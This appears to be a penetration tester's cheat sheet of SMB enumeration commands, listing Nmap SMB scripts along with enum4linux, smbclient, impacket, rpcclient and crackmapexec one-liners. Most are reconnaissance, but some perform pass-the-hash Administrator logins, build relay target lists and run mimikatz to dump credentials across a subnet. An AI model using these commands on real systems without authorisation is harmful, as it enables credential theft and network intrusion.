/usr/share/nmap/scripts/smb-brute.nse
/usr/share/nmap/scripts/smb-enum-domains.nse
/usr/share/nmap/scripts/smb-enum-groups.nse
/usr/share/nmap/scripts/smb-enum-processes.nse
/usr/share/nmap/scripts/smb-enum-services.nse
/usr/share/nmap/scripts/smb-enum-sessions.nse
/usr/share/nmap/scripts/smb-enum-shares.nse
/usr/share/nmap/scripts/smb-enum-users.nse
/usr/share/nmap/scripts/smb-flood.nse
/usr/share/nmap/scripts/smb-ls.nse
/usr/share/nmap/scripts/smb-mbenum.nse
/usr/share/nmap/scripts/smb-os-discovery.nse
/usr/share/nmap/scripts/smb-print-text.nse
/usr/share/nmap/scripts/smb-protocols.nse
/usr/share/nmap/scripts/smb-psexec.nse
/usr/share/nmap/scripts/smb-security-mode.nse
/usr/share/nmap/scripts/smb-server-stats.nse
/usr/share/nmap/scripts/smb-system-info.nse
- nmap --script smb-* -p 139,445, 172.21.0.0
- nmap --script smb-enum-* -p 139,445, 172.21.0.0
- Enum4linux -a 172.21.0.0
- Enum4linux -U 172.21.0.0
- Enum4linux -r 172.21.0.0
- Enum4linux -S 172.21.0.0
https://github.com/cddmp/enum4linux-ng
- Enum4linux 172.21.0.0 -A
- Enum4linux-ng 172.21.0.0 -A -C
- Enum4linux 172.21.0.0 -S
- Enum4linux 172.21.0.0 -K ticket.kirbi -A
- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password]
- smbmap -H 172.21.0.0 -d [domain] -u "" -p ""
- smbclient -L 172.21.0.0
- smbclient //172.21.0.0/tmp
Recursively list a directory:
$ smbclient \\\\x.x.x.x\\Folder
smb: \> recurse on
smb: \> ls
- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0
- impacket-smbclient username@172.21.0.0
- Impackert-sam SMB 172.21.0.0
- rpcclient -U "" -N 172.21.0.0 enumdomusers
- crackmapexec smb -L
- crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth
- crackmapexec 172.21.0.0 -u Administrator -H [hash] --share
- crackmapexec smb --gen-relay-list smb-targets.txt 172.21.0.0/24
- crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz
- crackmapexec smb x.x.x.x --pass-pol -u '' -p ''
- polenum -u '' -p '' -d x.x.x.x